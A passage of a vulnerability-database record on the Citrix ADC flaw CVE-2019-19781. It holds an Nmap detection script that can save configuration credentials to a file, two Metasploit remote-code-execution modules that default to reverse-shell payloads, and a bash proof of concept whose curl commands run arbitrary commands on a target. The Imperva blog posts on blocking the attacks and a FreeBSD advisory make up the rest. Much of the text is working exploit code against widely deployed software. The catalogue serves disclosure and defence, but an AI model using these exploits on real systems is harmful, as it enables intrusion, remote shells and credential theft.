Traversal aka (Shitrix)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"description\">\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\n-- traversal vulnerability that allows attackers to read configurations or\nany other file.\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2019</elem>\n-- <elem key=\"day\">17</elem>\n-- <elem key=\"month\">12</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">17-12-2019</elem>\n-- <table key=\"extra_info\">\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\n-- </table>\n-- </table>\n\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\n\nportrule = shortport.ssl\n\naction = function(host,port)\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\n local vuln = {\n title = 'Citrix ADC Path Traversal',\n state = vulns.STATE.NOT_VULN,\n description = [[\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\n12.1, and 13.0 are vulnerable\nto a unauthenticated path traversal vulnerability that allows attackers to\nread configurations or any other file.\n ]],\n references = {\n 'https://support.citrix.com/article/CTX267027',\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\n },\n dates = {\n disclosure = {year = '2019', month = '12', day = '17'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local path = \"/vpn/../vpns/cfg/smb.conf\"\n local response\n local output = {}\n local success = \"Host is vulnerable to CVE-2019-19781\"\n local fail = \"Host is not vulnerable\"\n local match = \"[global]\"\n local credentials\n local citrixADC\n response = http.get(host, port.number, path)\n\n if not response.status then\n stdnse.print_debug(\"Request Failed\")\n return\n end\n if response.status == 200 then\n if string.match(response.body, match) then\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\nSCRIPT_NAME,host.targetname or host.ip, path)\n vuln.state = vulns.STATE.VULN\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\nor host.ip,port.number, path))\n if outputFile then\n credentials = response.body:gsub('%W','.')\nvuln.check_results = stdnse.format_output(true, citrixADC)\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\nstored in the output file\")\nfile = io.open(outputFile, \"a\")\nfile:write(credentials, \"\\n\")\n else\n vuln.check_results = stdnse.format_output(true, citrixADC)\n end\n end\n elseif response.status == 403 then\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\nor host.ip, path, response.status)\n vuln.state = vulns.STATE.NOT_VULN\n end\n\n return vuln_report:make_output(vuln)\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "modified": "2020-01-13T00:00:00", "published": "2020-01-13T00:00:00", "id": "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "href": "", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "type": "exploitpack", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC Remote Code Execution',\n 'Description' => %q(\n An issue was discovered in Citrix Application Delivery Controller (ADC)\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n ),\n 'Author' => [\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['EDB', '47901'],\n ['EDB', '47902']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl meterpreter'\n }\n },\n 'Targets' => [\n ['Unix (remote shell)',\n 'Type' => :cmd_shell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\n 'DisablePayloadHandler' => 'false'\n }\n ],\n ['Unix (command-line)',\n 'Type' => :cmd_generic,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptAddress.new('RHOST', [true, 'The target address'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('RHOSTS')\n end\n\n def execute_command(command, opts = {})\n filename = Rex::Text.rand_text_alpha(16)\n nonce = Rex::Text.rand_text_alpha(6)\n\n request = {\n 'method' => 'POST',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\n 'headers' => {\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => 'http://127.0.0.1',\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\n 'desc' => 'desc',\n 'UI_inuse' => 'RfWeb'\n },\n 'encode_params' => false\n }\n\n begin\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n\n if received.code == 200\n vprint_status(\"#{received.get_html_document.text}\")\n sleep 2\n\n request = {\n 'method' => 'GET',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\n 'headers' => {\n 'NSC_USER' => nonce,\n 'NSC_NONCE' => nonce\n }\n }\n\n ## Trigger to gain exploitation.\n begin\n send_request_cgi(request)\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n return received\n end\n\n return false\n end\n\n def get_chr_payload(command)\n chr_payload = command\n i = chr_payload.length\n\n output = \"\"\n chr_payload.each_char do | c |\n i = i - 1\n output << \"chr(\" << c.ord.to_s << \")\"\n if i != 0\n output << \" . \"\n end\n end\n\n return output\n end\n\n def check\n begin\n received = send_request_cgi(\n \"method\" => \"GET\",\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\n )\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n\n if received && received.code != 200\n return Exploit::CheckCode::Safe\n end\n return Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n unless check.eql? Exploit::CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n else\n print_good('The target appears to be vulnerable.')\n end\n\n case target['Type']\n when :cmd_generic\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n received = execute_command(payload.encoded)\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\n print_warning('Dumping command output in parsed http response')\n print_good(\"#{received.get_html_document.text}\")\n else\n print_warning('Empty response, no command output')\n return\n end\n\n when :cmd_shell\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n execute_command(payload.encoded)\n end\n end\n\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "href": "", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "type": "exploitpack", "sourceData": "#!/bin/bash\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\n# Release Date : 11/01/2020\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\necho \"=================================================================================\n ___ _ _ ____ ___ _ _\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\n |__/ CVE-2019-19781\n=================================================================================\"\n##############################\nif [ -z \"$1\" ];\nthen\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\nexit;\nfi\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\necho -ne \"Command Output :\\n\"\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2020-01-19T15:26:21", "bulletinFamily": "blog", "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writeable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of various clients that were identified based on client verification tests, as sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - this was identified by cURL User-Agent as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the amount of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked: \n\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2020-01-19T15:00:50", "published": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. The part of the parameter before the \u201c&amp;\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object&#x27;s defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2020-07-06T15:01:00", "published": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2020-01-14T18:24:32", "bulletinFamily": "unix", "description": "\nArt Manion and Will Dormann report:\n\n\n\t By using an older and less-secure form of open(), it is\n\t possible for untrusted template files to cause reads/writes\n\t outside of the template directories. This vulnerability is\n\t a component of the recent Citrix exploit.\n\t \n\n", "modified": "2019-12-13T00:00:00", "published": "2019-12-13T00:00:00", "id": "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "href": "https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html", "title": "Template::Toolkit -- Directory traversal on write", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-09T16:39:53", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n", "modified": "2020-07-08T19:36:42", "published": "2020-01-14T02:25:07", "id": "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "href": "", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',\n 'Description' => %q{\n This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Project Zero India', # PoC used by this module\n 'TrustedSec', # PoC used by this module\n 'James Brytan', # PoC contributed independently\n 'James Smith', # PoC contributed independently\n 'Marisa Mack', # PoC contributed independently\n 'Rob Vinson', # PoC contributed independently\n 'Sergey Pashevkin', # PoC contributed independently\n 'Steven Laura', # PoC contributed independently\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (https://www.pirates.re/)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['EDB', '47901'],\n ['EDB', '47902'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => false,\n 'Targets' => [\n ['Python',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}\n ],\n ['Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',\n 'HttpClientTimeout' => 3.5\n },\n 'Notes' => {\n 'AKA' => ['Shitrix'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def exploit\n unless datastore['ForceExploit']\n case check\n when CheckCode::Vulnerable\n print_good('The target appears to be vulnerable')\n when CheckCode::Safe\n fail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable')\n else\n fail_with(Failure::Unknown, 'The target vulnerability state is unknown')\n end\n end\n\n print_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n case target['Type']\n when :python\n execute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\"))\n when :unix_cmd\n if (res = execute_command(payload.encoded)) && cmd_unix_generic?\n print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))\n end\n end\n end\n\n def execute_command(cmd, _opts = {})\n filename = rand_text_alpha(8..42)\n nonce = rand_text_alpha(8..42)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),\n 'headers' => {\n 'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\",\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => rand_text_alpha(8..42),\n 'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\"\n }\n )\n\n unless res && res.code == 200\n print_error('No response to POST newbm.pl request')\n return\n end\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"),\n 'headers' => {\n 'NSC_USER' => rand_text_alpha(8..42),\n 'NSC_NONCE' => nonce\n },\n 'partial' => true\n )\n\n unless res && res.code == 200\n print_warning(\"No response to GET #{filename}.xml request\")\n end\n\n register_files_for_cleanup(\n \"/netscaler/portal/templates/#{filename}.xml\",\n \"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\"\n )\n\n res\n end\n\n def chr_payload(cmd)\n cmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.')\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/citrix_dir_traversal_rce.rb"}, {"lastseen": "2020-08-09T15:01:33", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of a \"[global]\" directive in smb.conf, which this file should always contain.\n", "modified": "2020-07-08T19:36:42", "published": "2020-01-13T22:39:05", "id": "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "href": "", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 